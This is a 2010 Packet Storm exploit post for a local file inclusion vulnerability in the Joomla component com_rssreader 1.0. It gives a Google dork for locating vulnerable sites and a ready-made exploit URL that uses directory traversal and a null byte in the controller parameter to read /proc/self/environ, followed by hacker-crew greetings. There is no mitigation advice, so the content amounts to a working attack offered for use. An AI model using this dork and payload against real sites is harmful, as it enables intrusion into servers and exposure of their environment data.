Joomla RSSReader Local File Inclusion

2010-11-03T00:00:00
ID PACKETSTORM:95430
Type packetstorm
Reporter jos_ali_joe
Modified 2010-11-03T00:00:00

Description

                                        
                                            `=========================================================  
Joomla Component com_rssreader LFI Vulnerability  
=========================================================  
  
[+]Title : Joomla Component com_rssreader LFI Vulnerability  
[+]Software : com_rssreader version 1.0  
[+]Vendor : http://www.joomlashop.dk/  
[+]Download : http://www.joomlashop.dk/downloads.html  
[+]Author : jos_ali_joe  
[+]Contact : josalijoe[at]yahoo[dot]com  
[+]Home : http://josalijoe.wordpress.com/  
  
  
########################################################################  
  
Dork : inurl:index.php?option="com_rssreader"  
  
########################################################################  
  
------------------------------------------------------------------------  
  
LFI Exploit  
  
Exploit :  
  
http://example.com/index.php?option=com_rssreader&controller=../../../../../../../../../../../../../proc/self/environ%00  
  
--------------------------------------------------------------------------  
  
Thanx For :  
  
./Me Family ATeN4   
  
Greets For :  
  
./Devilzc0de crew – Kebumen Cyber – Explore Crew – Indonesian Hacker - Tecon Crew - Security Hub  
  
My Team : ./Indonesian Coder  
  
Special Thanks :  
  
/. google.com  
  
  
[+] Note :   
  
Hacking bukanlah tentang jawaban. Hacking adalah tentang jalan yang kamu ambil untuk mencari jawaban.   
Jika kamu membutuhkan bantuan, Jangan bertanya untuk mendapatkan jawaban,   
Bertanyalah tentang jalan yang harus kamu ambil untuk mencari jawaban untuk dirimu sendiri.  
`